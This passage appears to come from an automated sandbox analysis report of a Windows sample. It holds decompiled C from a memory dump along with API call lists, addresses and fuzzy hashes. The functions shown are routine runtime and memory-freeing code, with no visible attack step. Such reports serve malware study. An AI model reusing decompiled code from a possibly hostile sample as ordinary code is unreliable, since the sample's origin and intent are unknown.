                                                                                                                        													L47:
                                                                                                                        													_t80 = _t133 + 0xc;
                                                                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                        													__eflags =  *_t80;
                                                                                                                        													goto L48;
                                                                                                                        												}
                                                                                                                        												_v12 = _v12 + _t107;
                                                                                                                        												_t120 = _t120 - _t107;
                                                                                                                        												_v8 = _v8 - _t107;
                                                                                                                        												goto L39;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										_t113 =  *(_t133 + 4);
                                                                                                                        										__eflags = _t113;
                                                                                                                        										if(__eflags == 0) {
                                                                                                                        											goto L24;
                                                                                                                        										}
                                                                                                                        										if(__eflags < 0) {
                                                                                                                        											goto L47;
                                                                                                                        										}
                                                                                                                        										_t131 = _t120;
                                                                                                                        										__eflags = _t120 - _t113;
                                                                                                                        										if(_t120 >= _t113) {
                                                                                                                        											_t131 = _t113;
                                                                                                                        										}
                                                                                                                        										__eflags = _t131 - _v8;
                                                                                                                        										if(_t131 > _v8) {
                                                                                                                        											_t133 = 0;
                                                                                                                        											__eflags = _a8 - 0xffffffff;
                                                                                                                        											if(__eflags != 0) {
                                                                                                                        												E0040E430(_t131, _a4, 0, _a8);
                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                        											}
                                                                                                                        											_t114 = E0040F27B(__eflags);
                                                                                                                        											_push(_t133);
                                                                                                                        											_push(_t133);
                                                                                                                        											_push(_t133);
                                                                                                                        											_push(_t133);
                                                                                                                        											 *_t114 = 0x22;
                                                                                                                        											_push(_t133);
                                                                                                                        											goto L4;
                                                                                                                        										} else {
                                                                                                                        											E004134DF(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                        											 *_t133 =  *_t133 + _t131;
                                                                                                                        											_v12 = _v12 + _t131;
                                                                                                                        											_t120 = _t120 - _t131;
                                                                                                                        											_t134 = _t134 + 0x10;
                                                                                                                        											_v8 = _v8 - _t131;
                                                                                                                        											_t131 = _v20;
                                                                                                                        										}
                                                                                                                        										L39:
                                                                                                                        										__eflags = _t120;
                                                                                                                        									} while (_t120 != 0);
                                                                                                                        									goto L40;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t118 = _t90 | 0xffffffff;
                                                                                                                        						_t90 = _t118 / _a12;
                                                                                                                        						_t125 = _t118 % _a12;
                                                                                                                        						__eflags = _a16 - _t90;
                                                                                                                        						if(_a16 <= _t90) {
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					L3:
                                                                                                                        					_t92 = E0040F27B(_t138);
                                                                                                                        					_push(_t131);
                                                                                                                        					_push(_t131);
                                                                                                                        					_push(_t131);
                                                                                                                        					_push(_t131);
                                                                                                                        					 *_t92 = 0x16;
                                                                                                                        					_push(_t131);
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        0x0040ef7c
                                                                                                                        0x0040ef84
                                                                                                                        0x0040ef88
                                                                                                                        0x0040ef8d
                                                                                                                        0x0040ef8f
                                                                                                                        0x0040ef92
                                                                                                                        0x0040ef98
                                                                                                                        0x0040efbb
                                                                                                                        0x00000000
                                                                                                                        0x0040ef9f
                                                                                                                        0x0040ef9f
                                                                                                                        0x0040efa1
                                                                                                                        0x0040efc2
                                                                                                                        0x0040efc5
                                                                                                                        0x0040efc7
                                                                                                                        0x0040efd6
                                                                                                                        0x0040efd6
                                                                                                                        0x0040efd9
                                                                                                                        0x0040efde
                                                                                                                        0x0040efe3
                                                                                                                        0x0040efe3
                                                                                                                        0x0040efe6
                                                                                                                        0x0040efe8
                                                                                                                        0x00000000
                                                                                                                        0x0040efea
                                                                                                                        0x0040efea
                                                                                                                        0x0040efef
                                                                                                                        0x0040eff2
                                                                                                                        0x0040eff5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040eff7
                                                                                                                        0x0040effa
                                                                                                                        0x0040effe
                                                                                                                        0x0040f005
                                                                                                                        0x0040f008
                                                                                                                        0x0040f00a
                                                                                                                        0x0040f014
                                                                                                                        0x0040f00c
                                                                                                                        0x0040f00f
                                                                                                                        0x0040f00f
                                                                                                                        0x0040f01b
                                                                                                                        0x0040f01d
                                                                                                                        0x0040f10d
                                                                                                                        0x00000000
                                                                                                                        0x0040f023
                                                                                                                        0x0040f023
                                                                                                                        0x0040f023
                                                                                                                        0x0040f02a
                                                                                                                        0x0040f070
                                                                                                                        0x0040f070
                                                                                                                        0x0040f073
                                                                                                                        0x0040f0de
                                                                                                                        0x0040f0e4
                                                                                                                        0x0040f0e7
                                                                                                                        0x0040f172
                                                                                                                        0x00000000
                                                                                                                        0x0040f178
                                                                                                                        0x0040f0ed
                                                                                                                        0x0040f0f1
                                                                                                                        0x0040f141
                                                                                                                        0x0040f141
                                                                                                                        0x0040f145
                                                                                                                        0x0040f14f
                                                                                                                        0x0040f154
                                                                                                                        0x0040f154
                                                                                                                        0x0040f15c
                                                                                                                        0x0040f164
                                                                                                                        0x0040f165
                                                                                                                        0x0040f166
                                                                                                                        0x0040f167
                                                                                                                        0x0040f168
                                                                                                                        0x0040efb3
                                                                                                                        0x0040efb3
                                                                                                                        0x00000000
                                                                                                                        0x0040efb8
                                                                                                                        0x0040f0f3
                                                                                                                        0x0040f0f6
                                                                                                                        0x0040f0f9
                                                                                                                        0x0040f0fe
                                                                                                                        0x0040f0ff
                                                                                                                        0x0040f0ff
                                                                                                                        0x0040f0ff
                                                                                                                        0x0040f102
                                                                                                                        0x00000000
                                                                                                                        0x0040f102
                                                                                                                        0x0040f075
                                                                                                                        0x0040f079
                                                                                                                        0x0040f09a
                                                                                                                        0x0040f09f
                                                                                                                        0x0040f0a1
                                                                                                                        0x0040f0a3
                                                                                                                        0x0040f0a3
                                                                                                                        0x0040f07b
                                                                                                                        0x0040f082
                                                                                                                        0x0040f084
                                                                                                                        0x0040f091
                                                                                                                        0x0040f091
                                                                                                                        0x0040f091
                                                                                                                        0x0040f094
                                                                                                                        0x0040f086
                                                                                                                        0x0040f088
                                                                                                                        0x0040f08b
                                                                                                                        0x0040f08b
                                                                                                                        0x0040f096
                                                                                                                        0x0040f096
                                                                                                                        0x0040f0a5
                                                                                                                        0x0040f0a8
                                                                                                                        0x00000000
                                                                                                                        0x0040f0ae
                                                                                                                        0x0040f0ae
                                                                                                                        0x0040f0af
                                                                                                                        0x0040f0b3
                                                                                                                        0x0040f0b8
                                                                                                                        0x0040f0b9
                                                                                                                        0x0040f0ba
                                                                                                                        0x0040f0bf
                                                                                                                        0x0040f0c2
                                                                                                                        0x0040f0c4
                                                                                                                        0x0040f180
                                                                                                                        0x00000000
                                                                                                                        0x0040f180
                                                                                                                        0x0040f0ca
                                                                                                                        0x0040f0cd
                                                                                                                        0x0040f16e
                                                                                                                        0x0040f16e
                                                                                                                        0x0040f16e
                                                                                                                        0x0040f16e
                                                                                                                        0x00000000
                                                                                                                        0x0040f16e
                                                                                                                        0x0040f0d3
                                                                                                                        0x0040f0d6
                                                                                                                        0x0040f0d8
                                                                                                                        0x00000000
                                                                                                                        0x0040f0d8
                                                                                                                        0x0040f0a8
                                                                                                                        0x0040f02c
                                                                                                                        0x0040f02f
                                                                                                                        0x0040f031
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040f033
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040f039
                                                                                                                        0x0040f03b
                                                                                                                        0x0040f03d
                                                                                                                        0x0040f03f
                                                                                                                        0x0040f03f
                                                                                                                        0x0040f041
                                                                                                                        0x0040f044
                                                                                                                        0x0040f115
                                                                                                                        0x0040f117
                                                                                                                        0x0040f11b
                                                                                                                        0x0040f124
                                                                                                                        0x0040f129
                                                                                                                        0x0040f129
                                                                                                                        0x0040f12c
                                                                                                                        0x0040f131
                                                                                                                        0x0040f132
                                                                                                                        0x0040f133
                                                                                                                        0x0040f134
                                                                                                                        0x0040f135
                                                                                                                        0x0040f13b
                                                                                                                        0x00000000
                                                                                                                        0x0040f04a
                                                                                                                        0x0040f053
                                                                                                                        0x0040f058
                                                                                                                        0x0040f05b
                                                                                                                        0x0040f05d
                                                                                                                        0x0040f060
                                                                                                                        0x0040f062
                                                                                                                        0x0040f065
                                                                                                                        0x0040f068
                                                                                                                        0x0040f068
                                                                                                                        0x0040f105
                                                                                                                        0x0040f105
                                                                                                                        0x0040f105
                                                                                                                        0x00000000
                                                                                                                        0x0040f023
                                                                                                                        0x0040f01d
                                                                                                                        0x0040efe8
                                                                                                                        0x0040efc9
                                                                                                                        0x0040efce
                                                                                                                        0x0040efce
                                                                                                                        0x0040efd1
                                                                                                                        0x0040efd4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040efd4
                                                                                                                        0x0040efa3
                                                                                                                        0x0040efa3
                                                                                                                        0x0040efa8
                                                                                                                        0x0040efa9
                                                                                                                        0x0040efaa
                                                                                                                        0x0040efab
                                                                                                                        0x0040efac
                                                                                                                        0x0040efb2
                                                                                                                        0x00000000
                                                                                                                        0x0040efb2

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3886058894-0
                                                                                                                        • Opcode ID: 8fcea1e7f3a9ff326cfc4798bd3bd9d7cc3ac604e60f7f385c27333f9bc0308d
                                                                                                                        • Instruction ID: ad7a0912f5272dc139e3a5694086b9d86efaf6731e3cc18df21e16f420f9d9b0
                                                                                                                        • Opcode Fuzzy Hash: 8fcea1e7f3a9ff326cfc4798bd3bd9d7cc3ac604e60f7f385c27333f9bc0308d
                                                                                                                        • Instruction Fuzzy Hash: 5051F730A00205EBCB309F6AC84499FB775EF80324F24863BF825B66D1D3799E55CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E004054E0(char _a4) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t12;
                                                                                                                        				void* _t13;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				struct HINSTANCE__** _t19;
                                                                                                                        				void* _t21;
                                                                                                                        				signed int _t26;
                                                                                                                        				void* _t28;
                                                                                                                        
                                                                                                                        				_t1 =  &_a4; // 0x405643
                                                                                                                        				_t28 =  *_t1;
                                                                                                                        				if(_t28 != 0) {
                                                                                                                        					if( *((intOrPtr*)(_t28 + 8)) == 0) {
                                                                                                                        						L9:
                                                                                                                        						_t13 =  *(_t28 + 4);
                                                                                                                        						if(_t13 != 0) {
                                                                                                                        							VirtualFree(_t13, 0, 0x8000);
                                                                                                                        						}
                                                                                                                        						return HeapFree(GetProcessHeap(), 0, _t28);
                                                                                                                        					}
                                                                                                                        					_t26 = 0;
                                                                                                                        					if( *((intOrPtr*)(_t28 + 0xc)) <= 0) {
                                                                                                                        						L8:
                                                                                                                        						_push( *((intOrPtr*)(_t28 + 8)));
                                                                                                                        						E0040E815(_t21, _t26, _t28, _t35);
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					_push(_t21);
                                                                                                                        					do {
                                                                                                                        						_t18 =  *((intOrPtr*)(_t28 + 8));
                                                                                                                        						_t19 = _t18 + _t26 * 4;
                                                                                                                        						if( *(_t18 + _t26 * 4) != 0xffffffff) {
                                                                                                                        							FreeLibrary( *_t19);
                                                                                                                        						}
                                                                                                                        						_t26 = _t26 + 1;
                                                                                                                        						_t35 = _t26 -  *((intOrPtr*)(_t28 + 0xc));
                                                                                                                        					} while (_t26 <  *((intOrPtr*)(_t28 + 0xc)));
                                                                                                                        					_pop(_t21);
                                                                                                                        					goto L8;
                                                                                                                        				}
                                                                                                                        				return _t12;
                                                                                                                        			}













                                                                                                                        0x004054e1
                                                                                                                        0x004054e1
                                                                                                                        0x004054e7
                                                                                                                        0x004054ed
                                                                                                                        0x00405525
                                                                                                                        0x00405525
                                                                                                                        0x0040552a
                                                                                                                        0x00405534
                                                                                                                        0x00405534
                                                                                                                        0x00000000
                                                                                                                        0x00405544
                                                                                                                        0x004054f0
                                                                                                                        0x004054f5
                                                                                                                        0x00405518
                                                                                                                        0x0040551b
                                                                                                                        0x0040551c
                                                                                                                        0x00000000
                                                                                                                        0x00405524
                                                                                                                        0x004054f7
                                                                                                                        0x00405500
                                                                                                                        0x00405500
                                                                                                                        0x00405507
                                                                                                                        0x0040550a
                                                                                                                        0x0040550f
                                                                                                                        0x0040550f
                                                                                                                        0x00405511
                                                                                                                        0x00405512
                                                                                                                        0x00405512
                                                                                                                        0x00405517
                                                                                                                        0x00000000
                                                                                                                        0x00405517
                                                                                                                        0x0040554b

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,89FFFFFF,00000000,00405643,00000000,?,?,?,?,?,00401DAE,?), ref: 0040550F
                                                                                                                        • VirtualFree.KERNEL32(0041B2F4,00000000,00008000,00000000,00405643,00000000,?,?,?,?,?,00401DAE,?), ref: 00405534
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,CV@,00000000,00405643,00000000,?,?,?,?,?,00401DAE,?), ref: 0040553D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00401DAE,?), ref: 00405544
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$Heap$LibraryProcessVirtual
                                                                                                                        • String ID: CV@
                                                                                                                        • API String ID: 548792435-396382665
                                                                                                                        • Opcode ID: f6ef0cc57f74e93fefc7cbf5eaeb52e8174d16e89876a307992af9e1ee6c7b40
                                                                                                                        • Instruction ID: ec93b9244a2cdd63e360098806736050d25e692456fe2dd0a92e9b7555eb6b6a
                                                                                                                        • Opcode Fuzzy Hash: f6ef0cc57f74e93fefc7cbf5eaeb52e8174d16e89876a307992af9e1ee6c7b40
                                                                                                                        • Instruction Fuzzy Hash: 16018F71100A11EBC2209B26EC44F57B7AAFB88721F04853AA4A9A72E0D734F841CF68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00416BCA(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                        				signed int _t13;
                                                                                                                        				intOrPtr _t28;
                                                                                                                        				void* _t29;
                                                                                                                        				void* _t30;
                                                                                                                        
                                                                                                                        				_t30 = __eflags;
                                                                                                                        				_t26 = __edi;
                                                                                                                        				_t25 = __edx;
                                                                                                                        				_t22 = __ebx;
                                                                                                                        				_push(0xc);
                                                                                                                        				_push(0x421428);
                                                                                                                        				E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t28 = E00413823(__ebx, __edx, __edi, _t30);
                                                                                                                        				_t13 =  *0x422e1c; // 0xfffffffe
                                                                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                        					L6:
                                                                                                                        					E00410274(_t22, 0xc);
                                                                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                        					_t26 =  *0x422f00; // 0x422e28
                                                                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E00416B8C(_t8, _t26);
                                                                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                        					E00416C34();
                                                                                                                        				} else {
                                                                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                        						goto L6;
                                                                                                                        					} else {
                                                                                                                        						_t28 =  *((intOrPtr*)(E00413823(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				if(_t28 == 0) {
                                                                                                                        					E00410FBC(_t25, _t26, 0x20);
                                                                                                                        				}
                                                                                                                        				return E00410DB1(_t28);
                                                                                                                        			}







                                                                                                                        0x00416bca
                                                                                                                        0x00416bca
                                                                                                                        0x00416bca
                                                                                                                        0x00416bca
                                                                                                                        0x00416bca
                                                                                                                        0x00416bcc
                                                                                                                        0x00416bd1
                                                                                                                        0x00416bdb
                                                                                                                        0x00416bdd
                                                                                                                        0x00416be5
                                                                                                                        0x00416c09
                                                                                                                        0x00416c0b
                                                                                                                        0x00416c11
                                                                                                                        0x00416c15
                                                                                                                        0x00416c18
                                                                                                                        0x00416c23
                                                                                                                        0x00416c26
                                                                                                                        0x00416c2d
                                                                                                                        0x00416be7
                                                                                                                        0x00416be7
                                                                                                                        0x00416beb
                                                                                                                        0x00000000
                                                                                                                        0x00416bed
                                                                                                                        0x00416bf2
                                                                                                                        0x00416bf2
                                                                                                                        0x00416beb
                                                                                                                        0x00416bf7
                                                                                                                        0x00416bfb
                                                                                                                        0x00416c00
                                                                                                                        0x00416c08

                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00416BD6
                                                                                                                          • Part of subcall function 00413823: __getptd_noexit.LIBCMT ref: 00413826
                                                                                                                          • Part of subcall function 00413823: __amsg_exit.LIBCMT ref: 00413833
                                                                                                                        • __getptd.LIBCMT ref: 00416BED
                                                                                                                        • __amsg_exit.LIBCMT ref: 00416BFB
                                                                                                                        • __lock.LIBCMT ref: 00416C0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                        • String ID: (.B
                                                                                                                        • API String ID: 3521780317-1523247066
                                                                                                                        • Opcode ID: 9d591d5953f3a523f590c7904c2148318a916f87547ffaa3ac7edef2b92f3cf5
                                                                                                                        • Instruction ID: 69efc4498844c93df44f94e7f113891e5f276df7bac8a7875185d6db0fda695a
                                                                                                                        • Opcode Fuzzy Hash: 9d591d5953f3a523f590c7904c2148318a916f87547ffaa3ac7edef2b92f3cf5
                                                                                                                        • Instruction Fuzzy Hash: 3FF06D32E043149AD720FBBA95027CA73A0AB00724F52515FA44197291DBFCE9C1DA9E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E00402E40(void* __eax, short** __ecx, void* __edx, short* _a4, int _a8) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t13;
                                                                                                                        				void* _t22;
                                                                                                                        				int _t26;
                                                                                                                        				int _t29;
                                                                                                                        				void* _t32;
                                                                                                                        				int _t34;
                                                                                                                        				short* _t37;
                                                                                                                        
                                                                                                                        				_t22 = __edx;
                                                                                                                        				_t37 = _a4;
                                                                                                                        				_t18 = __ecx;
                                                                                                                        				if(_t37 != 0) {
                                                                                                                        					_t26 = lstrlenW(_t37) + 1;
                                                                                                                        					_t29 = _t26 * 4;
                                                                                                                        					E00402CE0(_t18, _t22, _t37, _t18, _t29,  &(_t18[1]), 0x80);
                                                                                                                        					_t13 = WideCharToMultiByte(_a8, 0, _t37, _t26,  *_t18, _t29, 0, 0);
                                                                                                                        					asm("sbb esi, esi");
                                                                                                                        					_t32 =  ~_t13 + 1;
                                                                                                                        					if(_t32 != 0) {
                                                                                                                        						_t13 = GetLastError();
                                                                                                                        						if(_t13 == 0x7a) {
                                                                                                                        							_t34 = WideCharToMultiByte(_a8, 0, _t37, _t26, 0, 0, 0, 0);
                                                                                                                        							E00402CE0(_t18, _a8, _t37, _t18, _t34,  &(_t18[1]), 0x80);
                                                                                                                        							_t13 = WideCharToMultiByte(_a8, 0, _t37, _t26,  *_t18, _t34, 0, 0);
                                                                                                                        							asm("sbb esi, esi");
                                                                                                                        							_t32 =  ~_t13 + 1;
                                                                                                                        						}
                                                                                                                        						if(_t32 != 0) {
                                                                                                                        							_t13 = E00401030();
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					return _t13;
                                                                                                                        				} else {
                                                                                                                        					 *__ecx = _t37;
                                                                                                                        					return __eax;
                                                                                                                        				}
                                                                                                                        			}












                                                                                                                        0x00402e40
                                                                                                                        0x00402e42
                                                                                                                        0x00402e46
                                                                                                                        0x00402e4a
                                                                                                                        0x00402e66
                                                                                                                        0x00402e68
                                                                                                                        0x00402e71
                                                                                                                        0x00402e8a
                                                                                                                        0x00402e94
                                                                                                                        0x00402e96
                                                                                                                        0x00402e99
                                                                                                                        0x00402e9b
                                                                                                                        0x00402ea4
                                                                                                                        0x00402ebd
                                                                                                                        0x00402eca
                                                                                                                        0x00402ee3
                                                                                                                        0x00402eed
                                                                                                                        0x00402eef
                                                                                                                        0x00402eef
                                                                                                                        0x00402ef2
                                                                                                                        0x00402ef4
                                                                                                                        0x00402ef4
                                                                                                                        0x00402ef2
                                                                                                                        0x00402efd
                                                                                                                        0x00402e4c
                                                                                                                        0x00402e4c
                                                                                                                        0x00402e50
                                                                                                                        0x00402e50

                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00402F36,004023A6,00000003,?,004023A6,00F3F310), ref: 00402E56
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000,00000003,?,004023A6,00F3F310), ref: 00402E8A
                                                                                                                        • GetLastError.KERNEL32(?,004023A6,00F3F310), ref: 00402E9B
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000,?,004023A6,00F3F310), ref: 00402EB7
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004023A6,00F3F310), ref: 00402EE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3322701435-0
                                                                                                                        • Opcode ID: c844c13618a281a68b591457a1185848e5b6b94b94c9d7a05cf61d7e1d15c382
                                                                                                                        • Instruction ID: bd7f2c9ded8c83ebaacfdbd5f2f1da4c36d20fae7a6fb5bea2b72b8987dcf7d0
                                                                                                                        • Opcode Fuzzy Hash: c844c13618a281a68b591457a1185848e5b6b94b94c9d7a05cf61d7e1d15c382
                                                                                                                        • Instruction Fuzzy Hash: 7E21B1316403247BE2309B15CC89F677F6CEB8AB94F148565FA45BA2C1DAB5A804C6F8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E0040F9FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				void* _t16;
                                                                                                                        				void* _t17;
                                                                                                                        				intOrPtr _t19;
                                                                                                                        				void* _t21;
                                                                                                                        				signed int _t22;
                                                                                                                        				intOrPtr* _t27;
                                                                                                                        				intOrPtr _t39;
                                                                                                                        				intOrPtr _t40;
                                                                                                                        				intOrPtr _t50;
                                                                                                                        
                                                                                                                        				_t37 = __edx;
                                                                                                                        				_push(8);
                                                                                                                        				_push(0x421098);
                                                                                                                        				E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t39 = _a4;
                                                                                                                        				_t50 = _t39;
                                                                                                                        				_t51 = _t50 != 0;
                                                                                                                        				if(_t50 != 0) {
                                                                                                                        					E00412272(_t39);
                                                                                                                        					_v8 = 0;
                                                                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                        					_t16 = E00412CC3(__edx, _t39, _t39);
                                                                                                                        					__eflags = _t16 - 0xffffffff;
                                                                                                                        					if(_t16 == 0xffffffff) {
                                                                                                                        						L6:
                                                                                                                        						_t17 = 0x4227c0;
                                                                                                                        					} else {
                                                                                                                        						_t21 = E00412CC3(__edx, _t39, _t39);
                                                                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                                                                        						if(_t21 == 0xfffffffe) {
                                                                                                                        							goto L6;
                                                                                                                        						} else {
                                                                                                                        							_t22 = E00412CC3(__edx, _t39, _t39);
                                                                                                                        							_t17 = ((E00412CC3(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x4242a0 + (_t22 >> 5) * 4));
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                        					_v8 = 0xfffffffe;
                                                                                                                        					E0040F9F5(_t39);
                                                                                                                        					_t19 = 0;
                                                                                                                        					__eflags = 0;
                                                                                                                        				} else {
                                                                                                                        					_t27 = E0040F27B(_t51);
                                                                                                                        					_t40 = 0x16;
                                                                                                                        					 *_t27 = _t40;
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					E00411AE6(__edx, _t40, 0);
                                                                                                                        					_t19 = _t40;
                                                                                                                        				}
                                                                                                                        				return E00410DB1(_t19);
                                                                                                                        			}













                                                                                                                        0x0040f9fd
                                                                                                                        0x0040f950
                                                                                                                        0x0040f952
                                                                                                                        0x0040f957
                                                                                                                        0x0040f95e
                                                                                                                        0x0040f963
                                                                                                                        0x0040f968
                                                                                                                        0x0040f96a
                                                                                                                        0x0040f988
                                                                                                                        0x0040f98e
                                                                                                                        0x0040f991
                                                                                                                        0x0040f996
                                                                                                                        0x0040f99c
                                                                                                                        0x0040f99f
                                                                                                                        0x0040f9cf
                                                                                                                        0x0040f9cf
                                                                                                                        0x0040f9a1
                                                                                                                        0x0040f9a2
                                                                                                                        0x0040f9a8
                                                                                                                        0x0040f9ab
                                                                                                                        0x00000000
                                                                                                                        0x0040f9ad
                                                                                                                        0x0040f9ae
                                                                                                                        0x0040f9cb
                                                                                                                        0x0040f9cb
                                                                                                                        0x0040f9ab
                                                                                                                        0x0040f9d4
                                                                                                                        0x0040f9db
                                                                                                                        0x0040f9de
                                                                                                                        0x0040f9e5
                                                                                                                        0x0040f9ea
                                                                                                                        0x0040f9ea
                                                                                                                        0x0040f96c
                                                                                                                        0x0040f96c
                                                                                                                        0x0040f973
                                                                                                                        0x0040f974
                                                                                                                        0x0040f976
                                                                                                                        0x0040f977
                                                                                                                        0x0040f978
                                                                                                                        0x0040f979
                                                                                                                        0x0040f97a
                                                                                                                        0x0040f97b
                                                                                                                        0x0040f983
                                                                                                                        0x0040f983
                                                                                                                        0x0040f9f1

                                                                                                                        APIs
                                                                                                                        • __lock_file.LIBCMT ref: 0040F988
                                                                                                                        • __fileno.LIBCMT ref: 0040F996
                                                                                                                        • __fileno.LIBCMT ref: 0040F9A2
                                                                                                                        • __fileno.LIBCMT ref: 0040F9AE
                                                                                                                        • __fileno.LIBCMT ref: 0040F9BE
                                                                                                                          • Part of subcall function 0040F27B: __getptd_noexit.LIBCMT ref: 0040F27B
                                                                                                                          • Part of subcall function 00411AE6: __decode_pointer.LIBCMT ref: 00411AF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2805327698-0
                                                                                                                        • Opcode ID: 8b6f667f0a6f572525547dc85a85809ff395df80ef213ddde0a434db3fffa174
                                                                                                                        • Instruction ID: 9d6962b9405be4d8b5adfd2842ec6abd50ea0026cb67b6ef41238cdbd98929b0
                                                                                                                        • Opcode Fuzzy Hash: 8b6f667f0a6f572525547dc85a85809ff395df80ef213ddde0a434db3fffa174
                                                                                                                        • Instruction Fuzzy Hash: 7D018873104A1066C23177792C42AAE76908EC2B34365437FF030EB6D2EA7C969292ED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E0041645E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                        				signed int _t15;
                                                                                                                        				LONG* _t21;
                                                                                                                        				long _t23;
                                                                                                                        				void* _t31;
                                                                                                                        				LONG* _t33;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t35;
                                                                                                                        
                                                                                                                        				_t35 = __eflags;
                                                                                                                        				_t29 = __edx;
                                                                                                                        				_t25 = __ebx;
                                                                                                                        				_push(0xc);
                                                                                                                        				_push(0x4213e8);
                                                                                                                        				E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t31 = E00413823(__ebx, __edx, __edi, _t35);
